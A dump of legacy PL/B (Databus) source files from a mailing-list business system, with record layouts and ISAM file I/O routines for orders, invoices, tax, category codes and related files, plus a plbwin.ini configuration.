edit #ASCIIresult into #GUID
return
//////////////////////////////////////////////////////////////////////////////
#end
//////////////////////////////////////////////////////////////////////////////
<file_sep>/include/nord5dd.inc
......................................
.nord5DD INCLUSION
.NIN supplimental Pending order Approval/Clearance ORDER FILE DEFINITION
.
.FILE NAME: NInord5
.REC LENGTH: 26 FIXED
.INDEX KEY: (1) 1-6 (LR#)
.
. Patch 1.2 Changed IP Address of File Manager DMB 18JUN05
. Patch 1.1 Added file to File Manager ASH 07AUG01
.
.START PATCH 1.1 REPLACED LOGIC
.nord5NAME INIT "NInord5"
.nord5NAME INIT "NINORD5.ISI|20.20.30.103:502"
nord5NAME INIT "NINORD5.ISI|NINS1:502"
.END PATCH 1.1 REPLACED LOGIC
nord5FILE IFILE KEYLEN=6,FIXED=26
nord5FLD DIM 6
nord5FLAG FORM 1
nord5PATH FORM 1
nord5LOCK FORM 1
.
.
ORD5VARS LIST
nord5LR DIM 6 001-006 ORDER LR
nord5STAT DIM 2 007-008 APPROVAL STATUS
.
.0 OR " " = 4 = Approved
.1 = 1rst Request 5 = Cancelled
.2 = 2nd Request 6 = Pending
.3 = Revised Request 7 = Denied
.8 = Pending Internal
.9 = Tentative Approval
NORD5PDTE DIM 8 009-016 DATE ENTERED CCYYMMDD
.note actual order date changes to date approved (if approved)
nord5STA2 DIM 2 017-018 CLEARANCE STATUS
.see notes from sales
nord5CDTE DIM 8 019-026 DATE ENTERED CCYYMMDD
.note actual order date chages to date apporved (if approved)
LISTEND
<file_sep>/include/NLOBDD.INC
..............................................................................
.
. NlobDD INCLUSION
. NIN list owner balance FILE DEFINITION
.
. FILE NAME : NINlob
. REC LENGTH: 28 FIXED
. INDEX KEY : 1-16
..............................................................................
.
NlobFILE IFILE KEYLEN=16,FIXED=28
NlobNAME INIT "NINlob "
NlobFLD DIM 16
NlobFLAG FORM 1
NlobPATH FORM 1
.
lobLON DIM 4 001-004 owner NUMBER
loblist dim 6 005-010 list number
lobCC DIM 2 011-012 century
lobYY DIM 2 013-014 year
lobMM DIM 2 015-016 month
lobbal form 9.2 017-028 balance
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/compnotesdd.inc
..............................................................................
.
. COMPNOTESDD INCLUSION
. COMPANY NOTES FILE DEFINITION
.
. FILE NAME : COMPNOTES
. REC LENGTH: 756
. INDEX KEY : 1-6
.
.DMB 03JUN2003 - FILE CREATED
..............................................................................
COMPNOTEFILE IFILE KEYLEN=6,VAR=756,NODUPLICATES,Name="COMPNOTES.ISI|NINS1:502"
COMPNOTENAME INIT "COMPNOTES.ISI|NINS1:502"
COMPNOTEFLD DIM 6
COMPNOTEFLAG FORM 1
COMPNOTELOCK FORM 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
COMPNOTEVARS list
COMPNOTECOMP DIM 6 1-6 COMPANY
COMPNOTES DIM 750 7-756 COMPANY NOTES
listend
<file_sep>/DEVELOP/ListMarketsProject/Notes/plbwin.ini
[version]
Interpreter=8.7
[environment]
PLB_TERM=ansi
PLB_SYSTEM=C:\Sunbelt\plbwin.87\code
PLB_PATH=C:\localdev\nin\plb-bin;c:\localdev\nin\data\index;c:\localdev\nin\data\text;c:\localdev\nin\data;c:\localdev\nin\httemplates;c:\localdev\nin\src\backoffice
PLBCMP_OPT=-ZG
PLBCMP_OUT=C:\localdev\nin\plb-bin
PLB_PREP=C:\localdev\nin\data
[variables]
CGIHeader=c:\localdev\nin\htdocs\header.html
CGIFooter=c:\localdev\nin\htdocs\footer.html
[nin]
ADMIN_EMAIL=<EMAIL>
DNSSERVER0=172.16.31.10
DNSSERVER1=172.16.58.3
DNSSERVER2=172.16.17.32
RECSPERPAGE=20
SMTPSERVER=mx1.adjacency.net
<file_sep>/include/MDCTXTIO.inc
..............................................................................
.******************************************************
.* MTXT List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MTXT DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_Seg
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MTXT, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MTXTKEY
. REQUIRED : 'MTXTFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MTXTKEY Branch MTXTPATH to MTXT1a,Mtxt1c
MTXT1a BRANCH MTXTFlag TO MTXT1b
CALL MTXTOpen
MTXT1b FILEPI 1;MTXTFile
READ MTXTFile,MTXTFld;MTXTVars
RETURN
MTXT1c BRANCH MTXTFlag TO MTXT1d
CALL MTXTOpen
MTXT1d FILEPI 1;MTXTFile2
READ MTXTFile2,MTXTFld2;MTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : MTXTTST
. REQUIRED : MTXTFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
MTXTTST Branch MTXTPATH to MTXT2a,Mtxt2c
MTXT2a BRANCH MTXTFlag TO MTXT2b
CALL MTXTOpen
MTXT2b FILEPI 1;MTXTFile
READ MTXTFile,MTXTFld;STR1
RETURN
MTXT2c BRANCH MTXTFlag TO MTXT2d
CALL MTXTOpen
MTXT2d FILEPI 1;MTXTFile2
READ MTXTFile2,MTXTFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : MTXTKS
. REQUIRED :
. RETURNED : MTXT Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MTXTKS Branch MTXTPATH to MTXT3a,MTXT3c
MTXT3a BRANCH MTXTFlag TO MTXT3b
CALL MTXTOpen
MTXT3b FILEPI 1;MTXTFile
READKS MTXTFile;MTXTVars
RETURN
MTXT3c BRANCH MTXTFlag TO MTXT3d
CALL MTXTOpen
MTXT3d FILEPI 1;MTXTFile2
READKS MTXTFile2;MTXTVars
RETURN
..............................................................................
. ENTRY POINT : MTXTSEQ
. REQUIRED :
. RETURNED : MTXT Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MTXTSEQ BRANCH MTXTFlag TO MTXT4
CALL MTXTOpen
MTXT4 FILEPI 1;MTXTFile
READ MTXTFile,SEQ;MTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : MTXTWRT
. REQUIRED : 'MTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MTXTWRT BRANCH MTXTFlag TO MTXT5
CALL MTXTOpen
MTXT5 FILEPI 1;MTXTFList
WRITE MTXTFList;MTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : MTXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MTXTUPD BRANCH MTXTFlag TO MTXT6
CALL MTXTOpen
MTXT6
FILEPI 1;MTXTFList
UPDATE MTXTFList;MTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : MTXTDEL
. REQUIRED : 'MTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MTXTDEL BRANCH MTXTFlag TO MTXT7
CALL MTXTOpen
MTXT7 FILEPI 1;MTXTFile
DELETE MTXTFList
RETURN
..............................................................................
.
. ENTRY POINT : MTXTKP
. REQUIRED : 'MTXTPATH'
. RETURNED : MIN DATACARD text
. DESCRIPTION : KEY SEQUENTIAL prior DATACARD FILE READ
.
MTXTKP
BRANCH MTXTFLAG,MTXT8
CALL MTXTOPEN
MTXT8
trap IOMssg giving Error if IO
FILEPI 1;MTXTFILE
READKP MTXTFILE;MTXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : MTXTAIM
. REQUIRED : MTXTFLD1,MTXTFLD2,MTXTFLD4,MTXTFLD5,MTXTFLD6,MTXTFLD7
. RETURNED : MIN DATACARD TEXT
. DESCRIPTION : AIM DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MTXTAIM
BRANCH MTXTFLAG,MTXT9
CALL MTXTOPEN
MTXT9
trap IOMssg giving Error if IO
FILEPI 1;MTXTFILE3
READ MTXTFILE3,MTXTFLD3;MTXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : MTXTKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : DATACARD RECORD
. DESCRIPTION : AIM KEY GENEREIC DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MTXTKG
BRANCH MTXTFLAG,MTXT10
CALL MTXTOPEN
MTXT10
FILEPI 1;MTXTFILE3
READKG MTXTFILE3;MTXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : MTXTKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : MIN DATACARD TEXT
. DESCRIPTION : KEY GENERIC PRIOR DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MTXTKGP
BRANCH MTXTFLAG,MTXT11
CALL MTXTOPEN
MTXT11
trap IOMssg giving Error if IO
FILEPI 1;MTXTFILE3
READKGP MTXTFILE3;MTXTVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : MTXTOpen
. REQUIRED : 'MTXTFlag' 'MTXTPATH'
. RETURNED : 'MTXTFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MTXTOpen TRAP MTXTGONE giving error IF IO
OPEN MTXTFList
TRAPCLR IO
MOVE C1 TO MTXTFlag
RETURN
..............................................................................
MTXTGONE MOVE MTXTNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/M2Ndd.inc
.* MIN 2 NIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
......................................................
. LAST MODIFIED
. patch 1.1 20 November 2006 DLH Move owner info to its own file
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
.M2nLodd - list owner xref
......................................................
M2NNAME INit "Min2Nin"
M2nFlist Filelist
M2NFILE IFILE Name="Min2nin.Isi|NINS1:502"
M2NFILE2 IFILE Name="Min2nin2.Isi|NINS1:502"
FileListEnd
M2NFLAG FORM 1
M2NPATH FORM 1
M2NFld Dim 6
M2NFld2 Dim 6
.
M2NVARS LIST .
M2NMin Dim 6 1-6 6 byte Min LIst code or right justified 5 byte owner code
M2NStatus dim 1 7-7 "*" = Special do not update
. special pricing -- need to print min list for counts etc - argh
M2NNIN DIM 6 8-13 NIN List #
ListEnd
<file_sep>/include/nmtxdd.inc
* NMTXDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER MAILER TAX FILE.
* *****************************************************************************
.
. FILE: NINMTAX
. LENGTH: 34
.COMPRESS: NONE
. TYPE: ISAM,FIXED
. KEY: NMTXFLD
...............................................................................
.
NMTXFILE IFILE KEYLEN=6,FIX=36
NMTXNAME INIT "NINMTAX|NINS1:502 "
NMTXFLD DIM 6
NMTXFLAG FORM 1
.
mtxvars list
MTXNUM DIM 6 1-6 MAILER NUMBER ---KEY--.
MTXCD DIM 5 7-11 TAX AREA CODE
MTXPERC DIM 2 12-13 TAX PERCENTAGE
MTXCODE DIM 1 14-14 CODE TO INDICATE WHICH EXEMPTION
MTXEXMPT DIM 20 15-34 EXEMPTION NUMBER
MTXC501 DIM 1 35-35 C501 STATUS MUST BE '3', '4', ' ',
. OR '5'.
mtxproft dim 1 36-36 "Y" = For Profit company. 9/20/dlh
listend
. LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CHECKWRITER DATABUS
.LISTNIN DATABUS
.LISTNIN1 DATABUS
.MLRMOD DATABUS
.NINP21 DATABUS
. LISTON
<file_sep>/include/IncLio.inc
..............................................................................
.
. INCLIO INCLUSION
. NIN income report FILE I/O ROUTINES
.
.
..............................................................................
.
. ENTRY POINT : INCLKEY
. REQUIRED : 'INCLFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
INCLKEY BRANCH INCLFLAG TO INCL1
CALL INCLOPEN
INCL1 trap IOMSSG GIVING ERROR if IO
FILEPI 1;INCLFILE
READ INCLFILE,INCLFLD;INCLVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLTST
. REQUIRED : INCLFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
INCLTST BRANCH INCLFLAG TO INCL2
CALL INCLOPEN
INCL2 trap IOMSSG GIVING ERROR if IO
FILEPI 1;INCLFILE
READ INCLFILE,INCLFLD;STR1
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL RETURN-TO FILE READ
.
INCLKS BRANCH INCLFLAG TO INCL3
CALL INCLOPEN
INCL3 trap IOMSSG GIVING ERROR if IO
FILEPI 1;INCLFILE
READKS INCLFILE;INCLVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLSEQ
. REQUIRED :
. RETURNED : RETURN-TO RECORD
. DESCRIPTION : SEQUENTIAL RETURN-TO FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
INCLSEQ BRANCH INCLFLAG TO INCL4
CALL INCLOPEN
INCL4 trap IOMSSG GIVING ERROR if IO
FILEPI 1;INCLFILE
READ INCLFILE,SEQ;INCLVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLWRT
. REQUIRED : 'INCLFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
INCLWRT Branch INCLFLAG to INCL5
CALL INCLOPEN
INCL5 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;INCLFILE
WRITE INCLFILE,INCLFLD;INCLVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
INCLUPD BRANCH INCLFLAG TO INCL6
CALL INCLOPEN
INCL6 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;INCLFILE
UPDATE INCLFILE;INCLVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : INCLDEL
. REQUIRED : 'INCLFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
INCLDEL BRANCH INCLFLAG TO INCL7
CALL INCLOPEN
INCL7 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;INCLFILE
DELETE INCLFILE,INCLFLD
TRAPCLR IO
RETURN
...............................................................................
..............................................................................
.
. ENTRY POINT : INCLOPEN
. REQUIRED : 'INCLFLAG'
. RETURNED : 'INCLFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
INCLOPEN TRAP INCLGONE IF IO
.
INCLOP
OPEN INCLFILE,INCLNAME
TRAPCLR IO
MOVE C1 TO INCLFLAG
RETURN
..............................................................................
INCLGONE MOVE INCLNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NPGEDD.INC
*******************************************************************************
*INDEXVAR.INC - VARIABLE INCLUDE FOR EOM INDEXES.
*******************************************************************************
* LENGTH 66
*
* ACCESS SEQUENTIAL.
***********************
. RELEASE 1.1 ASH 06DEC2004 - INCREASED COMPANY FIELD AND ADDED NEW PAGE NUMBER FIELD
.
.START PATCH 1.1 REPLACED LOGIC
.NPGEFILE FILE FIXED=60
.NPGEFLAG FORM 1
..NPGENAME INIT "PAGEXXXX "
..NPGENAME dim 6
.NPGENAME Init "\\NINS1\e\data\page.srt"
..
.INDNUM FORM 2 INDEX TYPE.
.. 1 = STATEMENT EDIT.
.. 2 = PAYABLES REPORT.
.. 3 = MONEY ON ACCOUNT.
.. 4 = INCOME BY MAILER.
.. 5 = INCOME BY LIST.
.. 6 = OVER 90 DAY STATEMENT.
.. 7 = STATEMENT EDIT BY INVOICE DATE.
.. 8 = BAD DEBT STATEMENT EDIT.
.. 9 = open with prepay to lo.
.INDMNUM DIM 4 MAILER/OWNER/ETC NUMBER.
.INDNAME DIM 25 CONTACT NAME.
.INDCOMP DIM 25 COMPANY NAME.
.INDPAGE DIM 4 PAGE NUMBER
...................................................
NPGEFILE FILE FIXED=66
NPGEFLAG FORM 1
NPGEFLG2 FORM 1
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NPGENAME Init "\\NINS1\e\data\page.srt "
NPGENAME Init "page.srt "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
.
NPGEFLE2 IFILE KEYLEN=6,FIXED=66,Name="page.isi"
NPGEFLD dim 6
.
NPGEVARS LIST
INDNUM FORM 2 1-2 INDEX TYPE.
. 1 = STATEMENT EDIT.
. 2 = PAYABLES REPORT.
. 3 = MONEY ON ACCOUNT.
. 4 = INCOME BY MAILER.
. 5 = INCOME BY LIST.
. 6 = OVER 90 DAY STATEMENT.
. 7 = STATEMENT EDIT BY INVOICE DATE.
. 8 = BAD DEBT STATEMENT EDIT.
. 9 = open with prepay to lo.
INDMNUM DIM 6 3-8 MAILER/OWNER/ETC NUMBER
INDNAME DIM 25 9-33 CONTACT NAME.
INDCOMP DIM 25 34-58 COMPANY NAME.
INDPAGE DIM 4 59-62 PAGE NUMBER
INDPAGE2 DIM 4 63-66 PAGE NUMBER
LISTEND
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/NCOUNTSI.INC
*******************************************************************************
.CLISTRD - READ LIST NAME.
CLISTRD TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READ COUNTS,CTKEY;CTKEY,CTLISTN
GOTO NOCTREC IF OVER
RETURN
*******************************************************************************
.CSEXRD - READ SEX COUNTS.
CSEXRD TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READ COUNTS,CTKEY;CTKEY,CTMALE,CTFEMALE,CTDUAL,CTCOMP,CTUNKN:
CTSEED
GOTO NOCTREC IF OVER
RETURN
*******************************************************************************
.CSCFRD - READ SCF COUNTS.
CSCFRD TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READ COUNTS,CTKEY;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
CTTOTAL
GOTO NOCTREC IF OVER
RETURN
*******************************************************************************
.CSCFRDKS- READ SCF COUNTS.
CSCFRDKS TRAP FORMAT IF FORMAT
MOVE "N" TO OVER
READKS COUNTS;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
CTTOTAL
GOTO NOCTREC IF OVER
. SCAN "SCF" IN CTKEY
. RETURN IF EQUAL
MOVE "SCF" TO SCF
. GOTO NOCTREC
RETURN
*******************************************************************************
.CSCFRDKP- READ SCF COUNTS.
CSCFRDKP TRAP KPFORMAT IF FORMAT
TRAP KPFORMAT IF RANGE
MOVE "N" TO OVER
READKP COUNTS;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
CTTOTAL
GOTO NOCTREC IF OVER
RETURN
...............................................................................
KPFORMAT MOVE "Y" TO OVER
TRAPCLR FORMAT
TRAPCLR RANGE
NORETURN
RETURN
*******************************************************************************
.CZIPRD - READ ZIP COUNTS.
CZIPRD TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READ COUNTS,CTKEY;CTKEY,CTTOTAL
GOTO NOCTREC IF OVER
RETURN
*******************************************************************************
.CZIPRDKS - READ ZIP COUNTS.
CZIPRDKS TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READKS COUNTS;CTKEY,CTTOTAL
GOTO NOCTREC IF OVER
RETURN
*******************************************************************************
.CDTTRD - READ UPDATE RECORD
CDTTRD TRAP CTFORMAT IF FORMAT
MOVE "N" TO OVER
READ COUNTS,CTKEY;CTKEY,CTDATE
GOTO NOCTREC IF OVER
RETURN
NOCTREC
MOVE "Y" TO OVER
RETURN
CTFORMAT
TRAPCLR FORMAT
CTFORMT1 KEYIN *P1:24,*EL,"FORMAT ERROR INFORM COMPUTER PERSONNEL!!!!",*B:
*B,*B,*B,*B,ANS,*P1:24,*EL;
CMATCH "Q" TO ANS
RETURN IF EQUAL
CMATCH "X" TO ANS
STOP IF EQUAL
GOTO CTFORMT1
*******************************************************************************
FORMAT TRAPCLR FORMAT
NORETURN
CALL NOCTREC
RETURN
*******************************************************************************
.END OF INCLUDE
*******************************************************************************
<file_sep>/include/NDATEDD.INC
. .............................................................................
.
. *** VARIABLES USED IN DATE HANDLING ROUTINES.
.
. .............................................................................
.
DATE DIM 6 DATE
DATE1 FORM 6
DATEM1 FORM 2 TEMP VARIABLE USED FOR EDIT CHECKS
DATEM2 FORM 2 TEMP VARIABLE USED FOR EDIT CHECKS
.CC FORM "19" CENTURY
YYMMDD FORM 6 DATE IN YYMMDD FORMAT (USED FOR DATE COMPARISON).
DAYSMO FORM 2 DAYS IN THE MONTH
LEAPYR DIM 1 LEAPYR = 'Y' IF LEAP YEAR; 'N' IF NOT
KEYDAT DIM 1 'Y' IF VALID DATE INPUT.
MMNAM DIM 3 MONTH NAME
.
. .............................................................................
<file_sep>/include/tinvdd.inc
..............................................................................
.
. TINVDD INCLUSION
. TDMC INVOICE FILE DEFINITION
.
. FILE NAME : TDMCINV
. REC LENGTH: 91 FIXED
. INDEX KEY : 1-6 (lr dupes allowed)
..............................................................................
.
TINVFILE IFILE KEYLEN=6,dup,Name="TDMCINV.isi|NINS1:502"
TINVNAME INIT "TDMCINV|NINS1:502"
TINVFLD DIM 6
TINVFLAG FORM 1
TINVLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=No locks
.
Tinvvars list
TINVLR DIM 6 001-006 NIN LR #
TINVB1 DIM 4 007-010 BLANK
.TINVdate DIM 6 011-016 Date
TINVdate DIM 8 011-018 Date ccyymmdd SB INVOICE DATE
TINVdesc DIM 30 019-048 NAME
.TinvINV DIM 6 049-054 TDMC ID NUM
TinvINV DIM 11 049-059 TDMC ID NUM
TinvDOLR DIM 12 060-071 $$$$
.begin patch
tinvOrd dim 11 072-082 infogroup order #
TinvFiller DIM 9 083-091
.TinvFiller DIM 20 072-091
listend
.tempory hold vars
TinvDolrH DIM 12 $$$$
TINVdateH DIM 8 Date ccyymmdd
TinvINVH DIM 11 049-059 TDMC ID NUM
.New file format
.TinvACt DIM 6 001-006 TDMC Account ID
.tinvb2 dim 2 007-008
.tinvid dim 6 009-014
.TINVLR DIM 6 015-020 NIN LR #
.TINVB1 DIM 4 021-064 BLANK
.TINVdate DIM 6 025-030 Date
.TINVdesc DIM 30 031-060 NAME
.TinvDOLR DIM 12 0?????? $$$$
..............................................................................*
<file_sep>/include/nftplogio.inc
//..............................................................................
// NFTPLOG2IO INCLUSION
// NIN DATACARD ADDRESSING FILE I/O ROUTINES
// FILE NAME : NINFTPLOG
// REC LENGTH: 346 VAR
// INDEX KEY : 6 (6 BYTE COMP NUMBER), 100 File NAME(AAM)
//..............................................................................
// ENTRY POINT : NFTPLOGKEY
// REQUIRED : 'NFTPLOGFLD'
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : EXACT ISAM KEY READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
//NFTPLOGKEY
// BRANCH NFTPLOGFLAG,NFTPLOG1
// CALL NFTPLOGOPEN
//NFTPLOG1
// trap IOMssg giving Error if IO
// READ NFTPLOGFILE,NFTPLOGFLD;NFTPLOGVARS
// trapclr IO
// RETURN
//..............................................................................
//
// ENTRY POINT : NFTPLOGTST
// REQUIRED : NFTPLOGFLD
// RETURNED :
// DESCRIPTION : TEST KEY
//NFTPLOGTST
// BRANCH NFTPLOGFLAG,NFTPLOG2
// CALL NFTPLOGOPEN
//NFTPLOG2
// trap IOMssg giving Error if IO
// READ NFTPLOGFILE,NFTPLOGFLD;;
// trapclr IO
// RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGKS
// REQUIRED :
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : KEY SEQUENTIAL DATACARD ADDRESSING FILE READ
//NFTPLOGKS
// BRANCH NFTPLOGFLAG,NFTPLOG3
// CALL NFTPLOGOPEN
//NFTPLOG3
// trap IOMssg giving Error if IO
// READKS NFTPLOGFILE;NFTPLOGVARS
// trapclr IO
// RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGSEQ
// REQUIRED :
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : SEQUENTIAL DATACARD ADDRESSING FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGSEQ
BRANCH NFTPLOGFLAG,NFTPLOG4
CALL NFTPLOGOPEN
NFTPLOG4
trap IOMssg giving Error if IO
READ NFTPLOGFILE,SEQ;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGWRT
// REQUIRED : 'NFTPLOGFLD'
// RETURNED :
// DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
NFTPLOGWRT
BRANCH NFTPLOGFLAG,NFTPLOG5
CALL NFTPLOGOPEN
NFTPLOG5
trap IOMssg giving Error if IO
FILEPI 1;NFTPLOGFLIST
WRITE NFTPLOGFLIST;NFTPLOGVARS
trapclr IO
RETURN
//.............................................................................
// ENTRY POINT : NFTPLOGUPD
// REQUIRED : A PREVIOUS KEY READ
// RETURNED :
// DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
NFTPLOGUPD
BRANCH NFTPLOGFLAG,NFTPLOG6
CALL NFTPLOGOPEN
NFTPLOG6
trap IOMssg giving Error if IO
FILEPI 1;NFTPLOGFLIST
UPDATE NFTPLOGFLIST;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGDEL
// REQUIRED : 'NFTPLOGFLD'
// RETURNED :
// DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
//
NFTPLOGDEL
BRANCH NFTPLOGFLAG,NFTPLOG7
CALL NFTPLOGOPEN
NFTPLOG7
trap IOMssg giving Error if IO
FILEPI 1;NFTPLOGFLIST
DELETE NFTPLOGFLIST
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGAIM
// REQUIRED : NFTPLOGFLD1,NFTPLOGFLD2
// RETURNED : RECORD
// DESCRIPTION : AIM FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGAIM
BRANCH NFTPLOGFLAG,NFTPLOG8
CALL NFTPLOGOPEN
NFTPLOG8
trap IOMssg giving Error if IO
READ NFTPLOGFLE2,NFTPLOGFLD1,NFTPLOGFLD2;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGKG
// REQUIRED : VALID PREVIOUS AIM READ
// RETURNED : RECORD
// DESCRIPTION : AIM KEY GENEREIC FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGKG
BRANCH NFTPLOGFLAG,NFTPLOG10
CALL NFTPLOGOPEN
NFTPLOG10
trap IOMssg giving Error if IO
READKG NFTPLOGFLE2;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
//
// ENTRY POINT : NFTPLOGOPEN
// REQUIRED : 'NFTPLOGFLAG'
// RETURNED : 'NFTPLOGFLAG' SET TO '1' IF OPENNED
// DESCRIPTION : OPEN NIN DATACARD ADDRESSING FILE
// DISPLAY ERROR AND ABORT IF NOT ON-LINE.
NFTPLOGOPEN
TRAP NFTPLOGGONE giving Error if IO
OPEN NFTPLOGFLIST .,EXCLUSIVE
trapclr IO
MOVE C1,NFTPLOGFLAG
RETURN
NFTPLOGGONE
MOVE NFTPLOGNAME,FILENAME
CALL FILEGONE
//..............................................................................<file_sep>/include/NCATCODEDD.inc
* NCATCODEDD.INC
* ************************************************************************************************
**
* NAMES IN THE NEWS MASTER CATEGORY CODES REFERENCE FILE
* ************************************************************************************************
**
.
. FILE: NINCODE
. LENGTH: 528
. TYPE: ISAM/AAM
. KEY: 1-6 NCATCODENUM (LIST NUM)
. AAMKEY: (1) 7-7 NCATCODETYPE
. (2) 8-77 NCATCODEMARKET
. (3) 78-147 NCATCODESUBMARK
. (4) 148-217 NCATCODEENV
. (5) 218-287 NCATCODEPOLIT
. (6) 288-357 NCATCODEHEALTH
. (7) 358-427 NCATCODEPROG
. (8) 428-428 NCATCODEFOCUS
...................................................................................................
..
NCATCODENAME INIT "NINCODE"
NCATCODEFLIST FILELIST
NCATCODEFILE IFILE KEYLEN=6,FIXED=528,Name="NINCODE.isi"
NCATCODEFLE2 AFILE FIXED=528,Name="NINCODE.aam"
FILELISTEND
NCATCODEFLAG FORM 1
NCATCODEFLD DIM 6 // HOLD LIST NUM
NCATCODEFLD1 DIM 4 // LIST TYPE
NCATCODEFLD2 DIM 73 // BROAD MARKET
NCATCODEFLD3 DIM 73 // SUB-MARKET
NCATCODEFLD4 DIM 73 // ENVIRON
NCATCODEFLD5 DIM 73 // POLITICAL
NCATCODEFLD6 DIM 73 // HEALTH/CHARIT
NCATCODEFLD7 DIM 73 // PROGRESSIVE
